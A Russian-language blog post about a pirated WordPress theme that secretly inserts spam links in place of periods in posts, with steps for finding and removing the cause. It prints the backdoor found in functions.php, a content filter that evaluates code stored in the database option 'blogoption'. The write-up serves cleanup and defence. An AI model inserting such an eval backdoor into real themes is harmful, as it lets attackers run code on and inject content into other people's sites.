RSS

Темы WP с сюрпризом

Темы WordPress бывают разные: красивые и … не очень; дорогие и … бесплатные, которые, почти всегда — с «бонусом». Сегодня, никого не удивишь внешними ссылками в подвале темы, пусть даже и в закодированном виде, но внешние ссылки в точке… Впрочем, обо всем по порядку.

Замена (установка) темы ВордПресс дело не сложное, но довольно хлопотное. Зная о том, сколько неприятностей от «сюрпризов» в бесплатных темах терпят начинающие веб мастера — от попадания сайта под фильтр АГС вплоть до полной его потери, я подошел к вопросу замены темы на блоге (это не То-Ен) со всей серьезностью. Выбирать тему решил только на известных интернет-ресурсах, они все в ТОП 10 по запросу – русские темы wordpress бесплатно. Вскоре, удача улыбнулась мне – я нашел именно то, что хотел. Премиум тема и в бесплатном доступе – это здорово.

Помня о том, где бывает бесплатный сыр, я проверил эти файлы антивирусом и только убедившись что ничего подозрительного не обнаружено, для дальнейшей проверки загрузил тему на свой тестовый сайт. Где первым делом, заглянул в подвал (footer.php) — проверить внешние ссылки и обнаружил там очень внушительный список «спонсоров» перевода темы. Ресурсы были различной тематики, в том числе и той, ссылки на которую совсем не нравятся поисковым системам. Что удивительно, все они были в простом, не закодированном виде. Убрать внешние ссылки удалось без особого труда. Но как оказалось – это был лишь отвлекающий маневр.

Далее я установил эту тему уже на свой рабочий блог. Проверил ее плагинами ТАС и Exploit-Scanner. Все ОК. Тема чистая. Но каково же было мое удивление когда через некоторое время я обнаружил массу открытых внешних ссылок со своего веб ресурса. На страницах блога было чисто, а в записях одна, две или даже три внешних ссылки в каждой. При этом, поисковые системы и посетители видели эти ссылки, а я — нет. Как усердно я не проверял все файлы этой темы — внешние ссылки обнаружить так и не удалось. Видимо удача пошутила со мной и с так понравившейся темой wordpress придется все же расстаться.

Поиски подобной проблемы в Интернете результатов не дали, но благодаря этому я установил бар RDS. К сожалению и он помочь ничем не смог … до того момента пока я не зашел на свой блог как обычный посетитель. Оказывается, внешние ссылки на блоге появляются вместо точки. Обычной точки, замена или удаление которой ничего не дает – ссылка появляется вместо другой точки и т.д. Но теперь я узнал, что нужно искать в Интернете – внешние ссылки в точке и вскоре нашел информацию по этой теме.

Внешние ссылки в записях блога выводит специальный скрипт, который обосновался в файле functions.php (функции темы) и имеет вот такой вид:

add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}

Я нашел его следующим образом: скачал файл functions.php (функции темы) к себе на компьютер; открыл его в текстовом редакторе Notepad++ и задал поиск кода приведенного выше. После того как расположение вредоносного скрипта было выявлено, я зашел в админ панель сайта «Внешний вид» → «Редактор» → «functions.php». Вырезал этот кусок кода и обновил файл. Готово. Внешние ссылки исчезли!

Внимание! Прежде чем приступить к редактированию файлов темы – обязательно сделайте копию. Вдруг что-то пойдет не так. Поэтому, лучше заранее подстраховаться.

Но еще остались записи в базе данных. Чтобы почистить их я отправился на хостинг: «Базы данных MySQL» → «База данных моего блога» → «Поиск» и прописал в поисковой строке: «file_get_contents»

Поиск выявил одно вхождение в таблице wp-options. Все, наконец я избавился от вредоносного кода. Удача мне действительно улыбнулась, но преподнесла небольшой урок. Что бы я изучил его и поделился с вами. Что я и сделал.

wp тема

Перечисляю вкратце шаги, которые необходимо сделать, при установке расшаренной премиум темы ворпресс, скаченной со стороннего варез-сайта или торрента:
Гарантий в безопасности никто не дает, но все же — берите темы с известных ресурсов, даже варезные сайты — есть с именем, и есть пустышки. Если у вас нет локального сервера, сначала устанавливайте тему на тестовый блог. Там проверяйте ее на внешние ссылки и прочие «подарки».
Также проверить тему на внешние линки и вредоносный код можно с помощью WP плагина Theme Authenticity Checker (TAC)

Как видите и ссылки в точке не повод отказываться от понравившейся темы. На помощь как всегда пришли ресурсы Интернета, благодаря которым и удалось решить эту проблему. Будьте внимательны при смене темы ворпресс. Удачи вам.

Comments are closed.

 
Powered by SH CMS (www.shchms.ru)